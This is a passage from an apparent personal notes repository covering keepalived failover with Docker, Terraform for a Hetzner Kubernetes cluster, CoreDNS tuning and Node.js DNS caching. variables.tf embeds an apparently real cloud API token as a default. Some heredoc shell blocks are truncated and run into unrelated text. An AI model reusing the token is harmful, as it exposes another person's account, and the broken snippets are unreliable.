define instance `nginx` which have Virtual IP `172.31.2.2/32` which should be attached to `eth0`. We also have 2 IP of `vs` containers in `unicast_peer`, but on startup IP of started container will be commented, so `keepalived` in this container will ping only another peer. 32 | 33 | In other section `virtual_server` we define Virtual Server on our Virtual IP on port 80 (`172.31.2.2:80`). We also define two real servers on `172.31.1.0` / `172.31.1.1` and can do this only on port 80, because define DR mode for IPVS. 34 | 35 | ### Observing 36 | 37 | Let's start all containers and fetch logs in following mode for `vs` containers: 38 | 39 | ```bash 40 | docker logs -f keepalived_vs0_1 41 | docker logs -f keepalived_vs1_1 42 | ``` 43 | 44 | In my case `keepalived_vs1_1` was entered to MASTER state, which means that this container have our Virtual IP right now. From host system: 45 | 46 | ```bash 47 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 48 | nginx1 49 | nginx0 50 | nginx1 51 | nginx0 52 | nginx1 53 | ``` 54 | 55 | Now, let's stop first NGINX container and run `curl` in loop again: 56 | 57 | ```bash 58 | $ docker stop keepalived_nginx0_1 59 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 60 | nginx1 61 | nginx1 62 | nginx1 63 | nginx1 64 | nginx1 65 | ``` 66 | 67 | `keepalived` discovered that `HTTP_GET` check for real server failed and removed service from list, in logs: 68 | 69 | ```bash 70 | Sun Aug 18 19:03:04 2019: HTTP_CHECK on service [172.31.1.0]:tcp:80 failed after 1 retry. 71 | Sun Aug 18 19:03:04 2019: Removing service [172.31.1.0]:tcp:80 to VS [172.31.2.2]:tcp:80 72 | ``` 73 | 74 | Now let's stop container in MASTER state and run `curl` in loop again: 75 | 76 | ```bash 77 | $ docker stop keepalived_vs1_1 78 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 79 | nginx1 80 | nginx1 81 | nginx1 82 | nginx1 83 | nginx1 84 | ``` 85 | 86 | Everything still works, but now Virtual IP located on `keepalived_vs0_1`, in logs: 87 | 88 | ```bash 89 | Sun Aug 18 19:06:52 2019: (nginx) Entering MASTER STATE 90 | Sun Aug 18 19:06:52 2019: (nginx) setting VIPs. 91 | Sun Aug 18 19:06:52 2019: Sending gratuitous ARP on eth0 for 172.31.2.2 92 | ``` 93 | 94 | Now let's return stopped first NGINX container back to life and run `curl` in loop: 95 | 96 | ```bash 97 | $ docker start keepalived_nginx0_1 98 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 99 | nginx0 100 | nginx1 101 | nginx0 102 | nginx1 103 | nginx0 104 | ``` 105 | 106 | in logs of `keepalived_vs0_1`: 107 | 108 | ```bash 109 | Sun Aug 18 19:08:55 2019: HTTP status code success to [172.31.1.0]:tcp:80 url(1). 110 | Sun Aug 18 19:08:55 2019: Remote Web server [172.31.1.0]:tcp:80 succeed on service. 111 | Sun Aug 18 19:08:55 2019: Adding service [172.31.1.0]:tcp:80 to VS [172.31.2.2]:tcp:80 112 | ``` 113 | 114 | ### Result 115 | 116 | With these actions we can see that probes and Virtual IP changes works. Of course, failover is not instant, it's takes few seconds for both Virtual Server and Virtual IP, but such operations should not be too often, so probably this enough in most cases. 117 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | nginx0: 5 | build: . 6 | hostname: nginx0 7 | networks: 8 | keepalived: 9 | ipv4_address: 172.31.1.0 10 | cap_add: 11 | - NET_ADMIN 12 | sysctls: 13 | net.ipv4.conf.eth0.arp_ignore: 1 14 | net.ipv4.conf.eth0.arp_announce: 2 15 | command: sh -c 'ip address add 172.31.2.2/32 dev lo && ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 16 | restart: on-failure 17 | 18 | nginx1: 19 | build: . 20 | hostname: nginx1 21 | networks: 22 | keepalived: 23 | ipv4_address: 172.31.1.1 24 | cap_add: 25 | - NET_ADMIN 26 | sysctls: 27 | net.ipv4.conf.eth0.arp_ignore: 1 28 | net.ipv4.conf.eth0.arp_announce: 2 29 | command: sh -c 'ip address add 172.31.2.2/32 dev lo && ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 30 | restart: on-failure 31 | 32 | vs0: 33 | build: . 34 | hostname: vs0 35 | networks: 36 | keepalived: 37 | ipv4_address: 172.31.2.0 38 | cap_add: 39 | - NET_ADMIN 40 | command: sh -c 'sed -i "s/172.31.2.0/# 172.31.2.0/" /etc/keepalived/keepalived.conf && keepalived -l -D -n' 41 | restart: on-failure 42 | 43 | vs1: 44 | build: . 45 | hostname: vs1 46 | networks: 47 | keepalived: 48 | ipv4_address: 172.31.2.1 49 | cap_add: 50 | - NET_ADMIN 51 | command: sh -c 'sed -i "s/172.31.2.1/# 172.31.2.1/" /etc/keepalived/keepalived.conf && keepalived -l -D -n' 52 | restart: on-failure 53 | 54 | networks: 55 | keepalived: 56 | ipam: 57 | config: 58 | - subnet: 172.31.0.0/16 59 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/keepalived.conf: -------------------------------------------------------------------------------- 1 | vrrp_instance nginx { 2 | state BACKUP 3 | interface eth0 4 | unicast_peer { 5 | 172.31.2.0 6 | 172.31.2.1 7 | } 8 | virtual_router_id 42 9 | priority 100 10 | virtual_ipaddress { 11 | 172.31.2.2/32 dev eth0 12 | } 13 | nopreempt 14 | } 15 | 16 | virtual_server 172.31.2.2 80 { 17 | lvs_sched rr 18 | lvs_method DR 19 | protocol TCP 20 | connect_timeout 2 21 | delay_loop 1 22 | real_server 172.31.1.0 80 { 23 | HTTP_GET { 24 | url { 25 | path / 26 | status_code 200 27 | } 28 | connect_ip 172.31.1.0 29 | connect_port 80 30 | } 31 | } 32 | real_server 172.31.1.1 80 { 33 | HTTP_GET { 34 | url { 35 | path / 36 | status_code 200 37 | } 38 | connect_ip 172.31.1.1 39 | connect_port 80 40 | } 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "kubernetes" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "master" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.1.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "worker" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.2.0/24" 32 | } 33 | 34 | # Control planes (master) 35 | resource "hcloud_server" "master_loadbalancer" { 36 | name = "master-loadbalancer" 37 | image = "ubuntu-18.04" 38 | server_type = "cx11-ceph" 39 | user_data = "${file("./user-data/default.sh")}" 40 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 41 | } 42 | 43 | resource "hcloud_server_network" "master_loadbalancer_network" { 44 | network_id = "${hcloud_network.default.id}" 45 | server_id = "${hcloud_server.master_loadbalancer.id}" 46 | ip = "10.0.1.1" 47 | } 48 | 49 | resource "hcloud_server" "master" { 50 | count = 3 51 | 52 | name = "master${count.index}" 53 | image = "ubuntu-18.04" 54 | server_type = "cx31-ceph" 55 | user_data = "${file("./user-data/default.sh")}" 56 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 57 | } 58 | 59 | resource "hcloud_server_network" "master_network" { 60 | count = length(hcloud_server.master) 61 | 62 | network_id = "${hcloud_network.default.id}" 63 | server_id = "${hcloud_server.master[count.index].id}" 64 | ip = "10.0.1.${count.index + 2}" 65 | } 66 | 67 | # Worker 68 | resource "hcloud_server" "worker" { 69 | count = 2 70 | 71 | name = "worker${count.index}" 72 | image = "ubuntu-18.04" 73 | server_type = "cx31-ceph" 74 | user_data = "${file("./user-data/default.sh")}" 75 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 76 | } 77 | 78 | resource "hcloud_server_network" "worker_network" { 79 | count = length(hcloud_server.worker) 80 | 81 | network_id = "${hcloud_network.default.id}" 82 | server_id = "${hcloud_server.worker[count.index].id}" 83 | ip = "10.0.2.${count.index + 1}" 84 | } 85 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "master_loadbalancer_ipv4" { 2 | description = "Public ipv4 address of master loadbalancer" 3 | value = "${hcloud_server_network.master_loadbalancer_network.ip} => ${hcloud_server.master_loadbalancer.ipv4_address}" 4 | } 5 | 6 | output "master_ipv4" { 7 | description = "Map of private ipv4 to public ipv4 for masters" 8 | value = { for i in range(length(hcloud_server.master)) : hcloud_server_network.master_network[i].ip => hcloud_server.master[i].ipv4_address } 9 | } 10 | 11 | output "worker_ipv4" { 12 | description = "Map of private ipv4 to public ipv4 for workers" 13 | value = { for i in range(length(hcloud_server.worker)) : hcloud_server_network.worker_network[i].ip => hcloud_server.worker[i].ipv4_address } 14 | } 15 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/user-data/default.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 7 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 8 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 9 | - iptables -A INPUT -i eth0 -j REJECT # Reject rest 10 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 11 | 12 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 13 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 14 | - ip6tables -A INPUT -i eth0 -j REJECT # Reject rest 15 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 16 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "VKzclT5C6NFdkfkT3dLUeEkPYgjDYBuKfUnv8iBi6wiEAURRmCZR5rElr5rtNvB1" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | "Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /2019-08-20-k8s-coredns-tune-for-external-domains/README.md: -------------------------------------------------------------------------------- 1 | # CoreDNS tune for external domains in Kubernetes 2 | 3 | - [Pod for tests](#pod-for-tests) 4 | - [Problem first](#problem-first) 5 | - [Solution](#solution) 6 | - [Resources](#resources) 7 | 8 | In this note we will need [Kubernetes](https://kubernetes.io/) cluster for experiments, you can check previous note [Kubernetes setup with kubeadm](https://github.com/fanatid/notes/tree/master/2019-08-19-kubernetes-setup-with-kubeadm), or 9 | 10 |
11 | use small summary note for installing kubernetes on one machine 12 | 13 | ```bash 14 | # Close ports with iptables 15 | apt install -y python iptables-persistent 16 | 17 | iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 18 | iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 19 | iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 20 | iptables -A INPUT -i eth0 -j REJECT # Reject rest 21 | iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 22 | 23 | ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 24 | ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 25 | ip6tables -A INPUT -i eth0 -j REJECT # Reject rest 26 | ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 27 | 28 | # Install CRI (Docker) 29 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 30 | add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" 31 | apt-get install -y docker-ce=5:18.09.8~3-0~ubuntu-bionic 32 | apt-mark hold docker-ce 33 | 34 | # Change Docker config and restart it 35 | cat > /etc/docker/daemon.json </dev/null 2>&1 && source <(kubeadm completion bash) && echo "which kubeadm 1>/dev/null 2>&1 && source <(kubeadm completion bash)" >> ~/.bashrc 57 | which kubectl 1>/dev/null 2>&1 && source <(kubectl completion bash) && echo "which kubectl 1>/dev/null 2>&1 && source <(kubectl completion bash)" >> ~/.bashrc 58 | 59 | # Create config for kubeadm init 60 | cat >./cluster.yaml < 96 | 97 | ### Pod for tests 98 | 99 | For testing DNS in pods I propose use [infoblox/dnstools](https://hub.docker.com/r/infoblox/dnstools) container: 100 | 101 | ```bash 102 | kubectl apply -f - < 10.96.0.10.53: 51855+ [1au] A? google.com.default.svc.cluster.local. (77) 139 | 18:44:10.554605 IP 10.96.0.10.53 > 10.244.0.24.59479: 51855 NXDomain*- 0/1/1 (170) 140 | 18:44:10.555325 IP 10.244.0.24.33612 > 10.96.0.10.53: 60060+ [1au] A? google.com.svc.cluster.local. (69) 141 | 18:44:10.555674 IP 10.96.0.10.53 > 10.244.0.24.33612: 60060 NXDomain*- 0/1/1 (162) 142 | 18:44:10.556033 IP 10.244.0.24.48711 > 10.96.0.10.53: 56924+ [1au] A? google.com.cluster.local. (65) 143 | 18:44:10.556304 IP 10.96.0.10.53 > 10.244.0.24.48711: 56924 NXDomain*- 0/1/1 (158) 144 | 18:44:10.556611 IP 10.244.0.24.59575 > 10.96.0.10.53: 39260+ [1au] A? google.com. (51) 145 | 18:44:10.556851 IP 10.96.0.10.53 > 10.244.0.24.59575: 39260 1/0/1 A 216.58.205.238 (77) 146 | ``` 147 | 148 | Why? Because if you check `/etc/resolf.conf`, you will find: 149 | 150 | ```bash 151 | nameserver 10.96.0.10 152 | search default.svc.cluster.local svc.cluster.local cluster.local 153 | options ndots:5 154 | ``` 155 | 156 | `ndots:5` is important here, from [resolf.conf man page](https://linux.die.net/man/5/resolv.conf): 157 | 158 | > ndots:n 159 | > 160 | > sets a threshold for the number of dots which must appear in a name given to res_query(3) (see resolver(3)) before an initial absolute query will be made. The default for n is 1, meaning that if there are any dots in a name, the name will be tried first as an absolute name before any search list elements are appended to it. The value for this option is silently capped to 15. 161 | 162 | what means that if name contains less than 5 dots, then local domains will be used first: 163 | 164 | ```bash 165 | google.com.default.svc.cluster.local. -> NXDOMAIN 166 | google.com.svc.cluster.local. -> NXDOMAIN 167 | google.com.cluster.local. -> NXDOMAIN 168 | google.com. -> A 169 | ``` 170 | 171 | If you have a lot of outside traffic that means that every resolve query will produce 4 DNS queries instead 1 (or 8 vs 2 in case both IPv4 & IPv6). 172 | 173 | ### Solution 174 | 175 | If you want solve it only for specified pod, you can define `dnsConfig` in pod spec: https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-config 176 | 177 | But better solve it on [CoreDNS](https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/#coredns) level, because it's also improve records validations for pods. 178 | 179 | For changing CoreDNS config we need change ConfigMap: 180 | 181 | ```bash 182 | kubectl edit -n kube-system configmap coredns 183 | ``` 184 | 185 | and change `Corefile`: 186 | 187 | - Add `autopath @kubernetes`. `autopath` will follow the chain of search path elements and return the first reply that is not NXDOMAIN. 188 | - Change `pods` in `kubernetes` to `verified` instead `insecure`. In this case CoreDNS will track all existed pods. `insecure` used by default for backward compatibility with [kube-dns](https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/#kube-dns). 189 | 190 | Because `Corefile` add plugin [reload](https://coredns.io/plugins/reload/) `CoreDNS` in pods will reload config itself (by default interval 30s with jitter 15s). 191 | 192 | After reloading (you can track this with command like: `kubectl logs -n kube-system -f coredns-5c98db65d4-fv2jt`): 193 | 194 | ```bash 195 | dnstools# dig google.com +search A 196 | ... 197 | ;; ANSWER SECTION: 198 | google.com.default.svc.cluster.local. 30 IN CNAME google.com. 199 | google.com. 30 IN A 216.58.205.238 200 | ... 201 | ``` 202 | 203 | and `tcpdump` show only 1 DNS query: 204 | 205 | ```bash 206 | 18:48:27.643399 IP 10.244.0.24.47595 > 10.96.0.10.53: 45594+ [1au] A? google.com.default.svc.cluster.local. (77) 207 | 18:48:27.643759 IP 10.96.0.10.53 > 10.244.0.24.47595: 45594 2/0/1 CNAME google.com., A 216.58.205.238 (163) 208 | ``` 209 | 210 | ### Resources 211 | 212 | - `CoreDNS GA for Kubernetes Cluster DNS`: https://kubernetes.io/blog/2018/07/10/coredns-ga-for-kubernetes-cluster-dns/ 213 | - `Customizing DNS Service`: https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/ 214 | - `Configuring Private DNS Zones and Upstream Nameservers in Kubernetes`: https://kubernetes.io/blog/2017/04/configuring-private-dns-zones-upstream-nameservers-kubernetes/ 215 | - `DNS for Services and Pods`: https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/ 216 | - `Custom DNS Entries For Kubernetes`: https://coredns.io/2017/05/08/custom-dns-entries-for-kubernetes/ 217 | - `CoreDNS, plugin kubernetes`: https://coredns.io/plugins/kubernetes/ 218 | - `CoreDNS, plugin autopath`: https://coredns.io/plugins/autopath/ 219 | - `infoblox/dnstools`: https://hub.docker.com/r/infoblox/dnstools 220 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/README.md: -------------------------------------------------------------------------------- 1 | # DNS in Node.js 2 | 3 | Currently latest release is [v12.9.0](https://nodejs.org/en/blog/release/v12.9.0/), so all links will refer to this version. 4 | 5 | ### Local DNS Server 6 | 7 | Probably simpler way run local DNS server is run [CoreDNS](https://coredns.io/) in [Docker](https://docker.com/) (configs already in [coredns folder](./coredns)): 8 | 9 | ```bash 10 | docker run -it --rm -v $(pwd)/coredns:/etc/coredns:ro -w /etc/coredns -p 127.0.0.2:53:53/udp coredns/coredns:1.6.2 11 | ``` 12 | 13 | Config define two records: 14 | 15 | - `a.example.com` — `A` (`127.0.0.1`) 16 | - `b.example.com` — `CNAME` (`a.example.com`) 17 | 18 | For testing launched server: 19 | 20 | ```bash 21 | dig +noall b.example.com @127.0.0.2 +answer 22 | b.example.com. 0 IN CNAME a.example.com. 23 | a.example.com. 0 IN A 10.0.0.0 24 | ``` 25 | 26 | ### Node.js 27 | 28 | [Node.js](https://nodejs.org/) provide two implementations: `dns.lookup` and various `dns.resolve*()`/`dns.reverse()`. See doc: https://nodejs.org/docs/v12.9.0/api/dns.html#dns_implementation_considerations 29 | 30 | Difference between them that `dns.lookup` use synchronous [getaddrinfo(3)](http://man7.org/linux/man-pages/man3/getaddrinfo.3.html) call. Result will be same as for most other programs. But synchronous call means that [UV Thread Pool](http://docs.libuv.org/en/v1.x/threadpool.html) used and `UV_THREADPOOL_SIZE` value is important. By default networking API in Node.js uses this implementation. 31 | 32 | Second implementation `dns.resolve*()` use [c-ares](https://c-ares.haxx.se/), where DNS queries always use network. This network communication always asyncronous, so libuv threadpool not used. 33 | 34 | Source code: 35 | 36 | - `dns.lookup` dispatch: https://github.com/nodejs/node/blob/v12.9.0/src/cares_wrap.cc#L1987 37 | - `c-ares` query: https://github.com/nodejs/node/blob/v12.9.0/src/cares_wrap.cc#L611 38 | 39 | ### Tests 40 | 41 | For testing local DNS server with `dns.lookup()` you will need change `resolv.conf`: 42 | 43 | ```bash 44 | cat > /etc/resolv.conf < { 98 | cache.delete(key) 99 | 100 | for (const callback of callbacks) { 101 | process.nextTick(callback, err, address, family) 102 | } 103 | }) 104 | cache.set(key, { callbacks, reqWrap }) 105 | 106 | return reqWrap 107 | } 108 | } 109 | ``` 110 | 111 | Idea of such "cached" function is simple. If `dns.lookup` already executed for some arguments at current time we do not create another such request, instead we save callback for later call with result. Once `dns.lookup` call our callback we remove data from "cache", i.e. instead storing result of lookup we "merge" all same requests. 112 | 113 | Result of such function: 114 | 115 | ```bash 116 | $ UV_THREADPOOL_SIZE=4 node js/dns-lookup-cache.js 117 | Elapsed time: 246.458ms 118 | ``` 119 | 120 | Elapsed time not going to zero because we send requests in chunks (100 items), and total 100k requests, i.e. with such function we will do 1000 requests (`100000 / 100 = 1000`). 121 | 122 | If you still have problem with such number of requests, you can use similar function with real cache, but TTL should be as small as it possible: 123 | 124 | ```js 125 | function createLookupCache (ttl = 10) { 126 | const cache = new Map() 127 | let nextCleanUp = Date.now() + 2 * ttl 128 | 129 | return function dnslookup (hostname, options, callback) { 130 | if (typeof options === 'function') { 131 | callback = options 132 | options = { family: 0 } 133 | } 134 | 135 | const now = Date.now() 136 | if (nextCleanUp < now) { 137 | for (const [key, { validUpTo }] of cache.entries()) { 138 | if (validUpTo < now) cache.delete(key) 139 | } 140 | 141 | nextCleanUp = now + 2 * ttl 142 | } 143 | 144 | const key = `${hostname};${JSON.stringify(options)}` 145 | const cachedLookup = cache.get(key) 146 | if (cachedLookup !== undefined && !(cachedLookup.result !== null && cachedLookup.validUpTo < now)) { 147 | if (cachedLookup.result === null) cachedLookup.callbacks.push(callback) 148 | else process.nextTick(callback, ...cachedLookup.result) 149 | 150 | return cachedLookup.reqWrap 151 | } 152 | 153 | const callbacks = [callback] 154 | const reqWrap = dns.lookup(hostname, options, (err, address, family) => { 155 | for (const callback of callbacks) { 156 | process.nextTick(callback, err, address, family) 157 | } 158 | 159 | const obj = cache.get(key) 160 | obj.result = [err, address, family] 161 | obj.validUpTo = Date.now() + ttl 162 | }) 163 | cache.set(key, { callbacks, reqWrap, result: null, validUpTo: null }) 164 | 165 | return reqWrap 166 | } 167 | } 168 | ``` 169 | 170 | ```bash 171 | $ UV_THREADPOOL_SIZE=4 node js/dns-lookup-cache2.js 172 | Elapsed time: 105.517ms 173 | ``` 174 | 175 | ### dgram / net / http 176 | 177 | Network API in Node.js uses `dns.lookup()`, but we can redefine it. 178 | 179 | ##### dgram 180 | 181 | For UDP we can pass `lookup` function to `dgram.createSocket`, see [docs](https://nodejs.org/api/dgram.html#dgram_dgram_createsocket_options_callback) / [source code](https://github.com/nodejs/node/blob/v12.9.0/lib/internal/dgram.js#L21-L50). 182 | 183 | ```js 184 | dgram.createSocket({ 185 | ... 186 | lookup: dnsCustomLookup 187 | }) 188 | ``` 189 | 190 | ##### net 191 | 192 | In `net` module custom `lookup` can be passed in `socket.connect`, see [docs](https://nodejs.org/api/net.html#net_socket_connect_options_connectlistener) / [source code](https://github.com/nodejs/node/blob/v12.9.0/lib/net.js#L940-L958). Optionally you also can pass `family` and `hints` as `dns.lookup()` options. If you planning use only IPv4 or IPv6 better set `family` to specified value, in such way you reduce number of DNS queries in 2 times (because by default value is `0` which produce `A` and `AAAA` queries). 193 | 194 | ```js 195 | const sock = new net.Socket() 196 | sock.connect({ 197 | ... 198 | family: 4, 199 | lookup: dnsCustomLookup 200 | }) 201 | ``` 202 | 203 | ##### http 204 | 205 | Documentation about [http.request](https://nodejs.org/api/http.html#http_http_request_url_options_callback) not mention `lookup` redefinition directly, but behind the scene [http.Agent](https://nodejs.org/api/http.html#http_class_http_agent) in [agent.createConnection](https://nodejs.org/api/http.html#http_agent_createconnection_options_callback) call [net.createConnection](https://nodejs.org/api/net.html#net_net_createconnection_options_connectlistener) which call `socket.connect`, so `dns.lookup()` can be redefined in same way as for `net` module. 206 | 207 | ```js 208 | http.request({ 209 | ... 210 | family: 4, 211 | lookup: dnsCustomLookup 212 | }) 213 | ``` 214 | 215 | It's also possible save specified options to `http.Agent`: 216 | 217 | ```js 218 | const agent = new http.Agent({ family: 4, lookup: dnsCustomLookup }) 219 | http.request({ agent }) 220 | ``` 221 | 222 | or patch [http.globalAgent](https://nodejs.org/api/http.html#http_http_globalagent): 223 | 224 | ```js 225 | http.globalAgent.options.family = 4 226 | http.globalAgent.options.lookup = dnsCustomLookup 227 | http.request({ ... }) 228 | ``` 229 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/coredns/Corefile: -------------------------------------------------------------------------------- 1 | . { 2 | errors 3 | file db.example.com example.com { 4 | reload 1s 5 | } 6 | forward . 8.8.8.8 7 | loop 8 | reload 2s 9 | } 10 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/coredns/db.example.com: -------------------------------------------------------------------------------- 1 | example.com. IN SOA dns.example.com. dns.example.com. 1564497611 2h 30m 1d 30 2 | a.example.com. IN A 127.0.0.1 3 | b.example.com. IN CNAME a.example.com. 4 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup-cache.js: -------------------------------------------------------------------------------- 1 | const dns = require('dns') 2 | const test = require('./test-fn') 3 | 4 | const lookup = createLookupCache() 5 | test(1e5, 100, (callback) => { 6 | lookup('a.example.com', { family: 4 }, (err) => { 7 | if (err) console.error(err) 8 | callback() 9 | }) 10 | }) 11 | 12 | function createLookupCache () { 13 | const cache = new Map() 14 | 15 | return function dnslookup (hostname, options, callback) { 16 | if (typeof options === 'function') { 17 | callback = options 18 | options = { family: 0 } 19 | } 20 | 21 | const key = `${hostname};${JSON.stringify(options)}` 22 | const cachedLookup = cache.get(key) 23 | if (cachedLookup !== undefined) { 24 | cachedLookup.callbacks.push(callback) 25 | return cachedLookup.reqWrap 26 | } 27 | 28 | const callbacks = [callback] 29 | const reqWrap = dns.lookup(hostname, options, (err, address, family) => { 30 | cache.delete(key) 31 | 32 | for (const callback of callbacks) { 33 | process.nextTick(callback, err, address, family) 34 | } 35 | }) 36 | cache.set(key, { callbacks, reqWrap }) 37 | 38 | return reqWrap 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup-cache2.js: -------------------------------------------------------------------------------- 1 | const dns = require('dns') 2 | const test = require('./test-fn') 3 | 4 | const lookup = createLookupCache() 5 | test(1e5, 100, (callback) => { 6 | lookup('a.example.com', { family: 4 }, (err) => { 7 | if (err) console.error(err) 8 | callback() 9 | }) 10 | }) 11 | 12 | function createLookupCache (ttl = 10) { 13 | const cache = new Map() 14 | let nextCleanUp = Date.now() + 2 * ttl 15 | 16 | return function dnslookup (hostname, options, callback) { 17 | if (typeof options === 'function') { 18 | callback = options 19 | options = { family: 0 } 20 | } 21 | 22 | const now = Date.now() 23 | if (nextCleanUp < now) { 24 | for (const [key, { validUpTo }] of cache.entries()) { 25 | if (validUpTo < now) cache.delete(key) 26 | } 27 | 28 | nextCleanUp = now + 2 * ttl 29 | } 30 | 31 | const key = `${hostname};${JSON.stringify(options)}` 32 | const cachedLookup = cache.get(key) 33 | if (cachedLookup !== undefined && !(cachedLookup.result !== null && cachedLookup.validUpTo < now)) { 34 | if (cachedLookup.result === null) cachedLookup.callbacks.push(callback) 35 | else process.nextTick(callback, ...cachedLookup.result) 36 | 37 | return cachedLookup.reqWrap 38 | } 39 | 40 | const callbacks = [callback] 41 | const reqWrap = dns.lookup(hostname, options, (err, address, family) => { 42 | for (const callback of callbacks) { 43 | process.nextTick(callback, err, address, family) 44 | } 45 | 46 | const obj = cache.get(key) 47 | obj.result = [err, address, family] 48 | obj.validUpTo = Date.now() + ttl 49 | }) 50 | cache.set(key, { callbacks, reqWrap, result: null, validUpTo: null }) 51 | 52 | return reqWrap 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-lookup.js: -------------------------------------------------------------------------------- 1 | const dns = require('dns') 2 | const test = require('./test-fn') 3 | 4 | test(1e5, 100, (callback) => { 5 | dns.lookup('a.example.com', { family: 4 }, (err) => { 6 | if (err) console.error(err) 7 | callback() 8 | }) 9 | }) 10 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-resolve-public-dns.js: -------------------------------------------------------------------------------- 1 | const dns = require('dns') 2 | const test = require('./test-fn') 3 | 4 | const resolver = new dns.Resolver() 5 | resolver.setServers(['8.8.8.8']) 6 | 7 | test(1e3, 100, (callback) => { 8 | resolver.resolve('google.com', 'A', (err) => { 9 | if (err) console.error(err) 10 | callback() 11 | }) 12 | }) 13 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/dns-resolve.js: -------------------------------------------------------------------------------- 1 | const dns = require('dns') 2 | const test = require('./test-fn') 3 | 4 | test(1e5, 100, (callback) => { 5 | dns.resolve('a.example.com', 'A', (err) => { 6 | if (err) console.error(err) 7 | callback() 8 | }) 9 | }) 10 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/js/test-fn.js: -------------------------------------------------------------------------------- 1 | module.exports = (count, parallel, fn) => { 2 | const labelTime = 'Elapsed time' 3 | 4 | const timerStart = () => console.time(labelTime) 5 | let 